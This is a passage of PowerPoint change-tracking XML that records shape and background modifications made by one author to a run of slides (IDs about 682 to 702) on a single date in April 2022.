          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2748516836" sldId="682"/>
            <ac:spMk id="2" creationId="{549816A9-A332-4E11-8F76-D98B4A3E1301}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2748516836" sldId="682"/>
            <ac:spMk id="3" creationId="{3C0B55CE-57AA-405F-BFAD-70032C4A9719}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2748516836" sldId="682"/>
            <ac:spMk id="5" creationId="{D81257D4-2922-4BDE-AAB0-E6B9C72798FD}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1258186332" sldId="683"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1258186332" sldId="683"/>
            <ac:spMk id="2" creationId="{E8562BAD-B451-478A-BDCF-32BCA9825C75}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1258186332" sldId="683"/>
            <ac:spMk id="3" creationId="{20D21E32-D61B-4F33-B175-F935FD63613C}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3251764474" sldId="684"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3251764474" sldId="684"/>
            <ac:spMk id="2" creationId="{F7F48204-D3F2-455A-A8F0-C60DDEE7C564}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3251764474" sldId="684"/>
            <ac:spMk id="3" creationId="{73100CCC-AE8F-4D32-998A-43F0AD6DD22E}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2671877232" sldId="685"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2671877232" sldId="685"/>
            <ac:spMk id="2" creationId="{FA2C71AE-FA18-41F7-86A0-1D7304E53531}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2671877232" sldId="685"/>
            <ac:spMk id="3" creationId="{6B3651CD-08F8-4EF4-9502-F4729B6C7386}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1520143" sldId="686"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1520143" sldId="686"/>
            <ac:spMk id="2" creationId="{9C14BB8A-0096-47DA-8677-EE75CC548AB9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1520143" sldId="686"/>
            <ac:spMk id="3" creationId="{3D347FCA-44F4-4E78-83A1-A2DBA865CA41}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4286030089" sldId="687"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4286030089" sldId="687"/>
            <ac:spMk id="2" creationId="{FFE13621-8CA7-4C78-B357-EB7D765AE77C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4286030089" sldId="687"/>
            <ac:spMk id="3" creationId="{43DDF236-D2FE-4420-8BBD-815340CB8D3E}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4268161633" sldId="688"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4268161633" sldId="688"/>
            <ac:spMk id="2" creationId="{4A331FA8-5280-4A40-B8B8-34608778C00E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4268161633" sldId="688"/>
            <ac:spMk id="3" creationId="{C7C889E7-3B63-4AFC-951C-C0FAD8A6CFB0}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2437337427" sldId="689"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2437337427" sldId="689"/>
            <ac:spMk id="2" creationId="{B9160A51-F9E2-4F46-BBA4-930849461A62}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2437337427" sldId="689"/>
            <ac:spMk id="3" creationId="{B4CF8FB6-DDAF-4517-BC19-AC832D683E80}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3111206579" sldId="690"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3111206579" sldId="690"/>
            <ac:spMk id="2" creationId="{898CB077-4ED6-4416-AA67-C7085A4CC0F4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3111206579" sldId="690"/>
            <ac:spMk id="3" creationId="{B4F90446-7D5B-47C6-9EA5-BA1BB2EE6EE0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3111206579" sldId="690"/>
            <ac:spMk id="5" creationId="{4FF1C8BA-17D3-4B11-BA36-0B27677D48DC}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="372568149" sldId="691"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="372568149" sldId="691"/>
            <ac:spMk id="2" creationId="{912725DC-2814-4185-B420-28D72F1E33A5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="372568149" sldId="691"/>
            <ac:spMk id="3" creationId="{D9900CD0-5654-4CDE-B81A-AF3D4DF585AF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="372568149" sldId="691"/>
            <ac:spMk id="5" creationId="{BB4550CC-05C0-4F4A-8514-932A9672FFA3}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2113048212" sldId="692"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2113048212" sldId="692"/>
            <ac:spMk id="2" creationId="{695DFA9E-15CB-450B-8BDC-090C32CEA2AE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2113048212" sldId="692"/>
            <ac:spMk id="3" creationId="{ACC6299B-97A0-424F-9D1A-548127DCBE88}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1586069126" sldId="693"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1586069126" sldId="693"/>
            <ac:spMk id="2" creationId="{7F3DFB96-2F62-4351-AB2F-46E2E0C7B759}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1586069126" sldId="693"/>
            <ac:spMk id="3" creationId="{67FCEE46-15EC-43C2-92EA-D6BEEF3401EB}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="606618473" sldId="694"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="606618473" sldId="694"/>
            <ac:spMk id="2" creationId="{9B40B2B3-2614-4997-BF4C-4E1EFB5B4684}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="606618473" sldId="694"/>
            <ac:spMk id="3" creationId="{BFA04D83-52D6-4F47-9750-72849D498F10}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3128936530" sldId="695"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3128936530" sldId="695"/>
            <ac:spMk id="2" creationId="{19ADBD59-9AB2-4FA3-8717-9AB8ADFB7C3F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3128936530" sldId="695"/>
            <ac:spMk id="3" creationId="{8A341C55-EC0E-46BF-A91C-62C623252111}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3128936530" sldId="695"/>
            <ac:spMk id="5" creationId="{257E932D-12C8-4434-9C83-3430735833F2}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1193079361" sldId="696"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1193079361" sldId="696"/>
            <ac:spMk id="2" creationId="{12D5E18B-FD01-4636-B84D-9C3356CA8917}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1193079361" sldId="696"/>
            <ac:spMk id="3" creationId="{D1FADDA0-3500-4E4B-9386-3B23ACDFBC78}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4139866569" sldId="697"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4139866569" sldId="697"/>
            <ac:spMk id="2" creationId="{99E3D372-415B-4325-B4E3-75C87D509438}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4139866569" sldId="697"/>
            <ac:spMk id="3" creationId="{36FE292D-86FA-4A42-912F-7D4E42473B40}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1350618299" sldId="698"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1350618299" sldId="698"/>
            <ac:spMk id="2" creationId="{99E3D372-415B-4325-B4E3-75C87D509438}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1350618299" sldId="698"/>
            <ac:spMk id="3" creationId="{36FE292D-86FA-4A42-912F-7D4E42473B40}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2178412350" sldId="699"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2178412350" sldId="699"/>
            <ac:spMk id="2" creationId="{3982252E-8D8C-4788-959D-A425B98E8E7C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2178412350" sldId="699"/>
            <ac:spMk id="3" creationId="{2854238B-403F-45ED-8806-96C2457168DF}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1014235030" sldId="700"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1014235030" sldId="700"/>
            <ac:spMk id="2" creationId="{99E3D372-415B-4325-B4E3-75C87D509438}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1014235030" sldId="700"/>
            <ac:spMk id="3" creationId="{36FE292D-86FA-4A42-912F-7D4E42473B40}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1159608241" sldId="701"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1159608241" sldId="701"/>
            <ac:spMk id="2" creationId="{8CDEAAED-D2BF-438F-8DCB-F5D3C92EC10D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1159608241" sldId="701"/>
            <ac:spMk id="3" creationId="{782FDFD6-9BCF-4465-878D-B64DD7FD9EEC}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2169432824" sldId="702"/>
